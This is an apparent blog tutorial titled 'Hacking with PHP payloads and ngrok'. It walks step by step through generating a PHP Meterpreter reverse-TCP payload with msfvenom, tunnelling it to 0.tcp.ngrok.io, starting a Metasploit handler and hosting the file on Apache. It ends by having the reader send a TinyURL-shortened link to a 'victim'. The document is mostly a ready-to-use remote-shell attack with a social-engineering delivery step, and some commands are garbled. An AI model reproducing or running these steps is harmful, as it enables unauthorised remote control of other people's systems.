Hacking with PHP payloads and ngrok – HackingVision

Hacking with PHP payloads and ngrok – HackingVision

Welcome back to HackingVision. Today we will be hacking with PHP payloads,  in this tutorial we will be using msfvenom.

Msfvenom comes included with Kali Linux operating system if you don’t already have Kali Linux installed you can download here.


Step 1: Installing ngrok

Please follow the instructions to install ngrok.

Lets start by downloading ngrok.  Download ngrok here  https://ngrok.com/download .

Once ngrok has finished downloading extract the Zip archive and then cd into it for example “cd ngrok”

cd ngrok


Install your authtoken (auth code below is a example copy auth token from ngrok.com account.Copy the authentication code from your account in ngrok.com we will be using this to authenticate our tunnel. You can do this by going to the folder where ngrok is stored and using .”/ngrok authtoken yourauthtokenhere ” The authentication code will then be saved.



./ngrok authtoken UHTsJVmnmrninfibyuvtc_2b9xscccvdvdfsaq8f7z3


Now we will create a secure TCP tunnel.  Open up a new  terminal and type ngrok tcp 4545  change port number to whatever port you would like to use.





Step 2: Creating PHP Payload


We will now use msfvenom to create PHP payload.

Open up a new command terminal enter command below change LPORT to port you specified when starting ngrok.

 msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=17928 R > home.php



Step 3: Starting multi/handler

In a new command terminal enter commands

 service postgrsql start
service apache2 start



Enter commands below into terminal.


use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost

set port 17928


Copy the php file to /var/www/html



Type exploit in msfconsole terminal.



Step 4: Shorten URL


Go to tinyurl.com and shorten url.


For example


Send shortened Tiny URL link to victim since we are working within local environment


Hope u enjoyed this tutorial more to come happy hacking and remember hack the planet.